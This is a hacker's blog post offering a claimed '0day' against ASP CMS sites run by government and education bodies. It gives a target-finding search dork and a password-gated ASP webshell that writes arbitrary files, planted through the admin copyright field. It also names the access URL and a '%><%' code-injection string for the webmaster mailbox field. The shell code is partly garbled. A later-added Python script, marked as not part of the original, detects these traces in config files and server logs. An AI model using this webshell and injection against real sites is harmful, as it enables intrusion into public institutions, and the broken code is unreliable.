Hacker 小风's Blog

At the end of the road there is still more road, as long as you are willing to walk it.

0day affecting government and education websites in bulk

inurl:printpage.asp?ArticleID=

Write a small webshell into the copyright information field in the admin backend:
if Request("pass")="520" then
dim allen,creat,text,thisline,path
if Request("creat")="yes" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
outfile.WriteLine Request("text")
Response.write "xxxx"
end if
Response.write "

"
Response.write ""&thisline&"
"
Response.write ""
Response.write ""
Response.end
end if
%>

Do not navigate to any other page. In the IE address bar, directly replace admin/Admin_Login.asp with inc/config.asp?t2ck=520

You can write "%><%' into the webmaster mailbox field, then connect directly to config.asp in the inc directory.
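
For site owners running this kind of ASP CMS, the following is an added example (not part of the original post) that checks for the two traces this technique leaves: request-handling code inside the config include, and direct requests to inc/config.asp carrying a query string. It assumes IIS W3C logs with a #Fields header that includes cs-uri-stem and cs-uri-query; the function names and all sample data are constructed for illustration.

```python
import re

# Indicators taken from the snippet on this page: file creation plus request input.
FILE_WRITE = re.compile(r"CreateTextFile\s*\(|Scripting\.FileSystemObject", re.I)
REQUEST_INPUT = re.compile(r"\bRequest\s*(\.\s*(QueryString|Form)\s*)?\(", re.I)

def config_findings(asp_source):
    """Return reasons an ASP config include looks tampered with (heuristic)."""
    findings = []
    if REQUEST_INPUT.search(asp_source):
        findings.append("config include reads request input")
        if FILE_WRITE.search(asp_source):
            findings.append("file write reachable alongside request input")
    return findings

def direct_config_hits(log_lines, stem="/inc/config.asp"):
    """Return (date, time, client IP, query) for direct hits on the include with a query string."""
    fields, hits = [], []
    for line in log_lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # W3C header names the columns
            continue
        if line.startswith("#") or not line.strip():
            continue
        row = dict(zip(fields, line.split()))
        query = row.get("cs-uri-query", "-")
        if row.get("cs-uri-stem", "").lower() == stem and query != "-":
            hits.append((row.get("date"), row.get("time"), row.get("c-ip"), query))
    return hits

# Constructed sample data (not from a real site).
CLEAN_CONFIG = '<%\nConst SiteName = "Example"\nConst Copyright = "Example Org"\n%>'
TAMPERED_CONFIG = (
    '<%\nConst Copyright = ""%><%\nif Request("pass")="520" then\n'
    'Set fs = CreateObject("Scripting.FileSystemObject")\nend if\n%>'
)
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2024-01-01 10:00:00 203.0.113.5 GET /index.asp - 200",
    "2024-01-01 10:00:05 203.0.113.5 GET /inc/config.asp t2ck=520 200",
    "2024-01-01 10:00:09 198.51.100.7 GET /admin/Admin_Login.asp - 200",
]

if __name__ == "__main__":
    print(config_findings(CLEAN_CONFIG))
    print(config_findings(TAMPERED_CONFIG))
    print(direct_config_hits(SAMPLE_LOG))
```

A config include is normally only pulled in by other pages, so any finding from either function is a reason to compare the file against a known-good copy and review which admin fields are written into it unescaped.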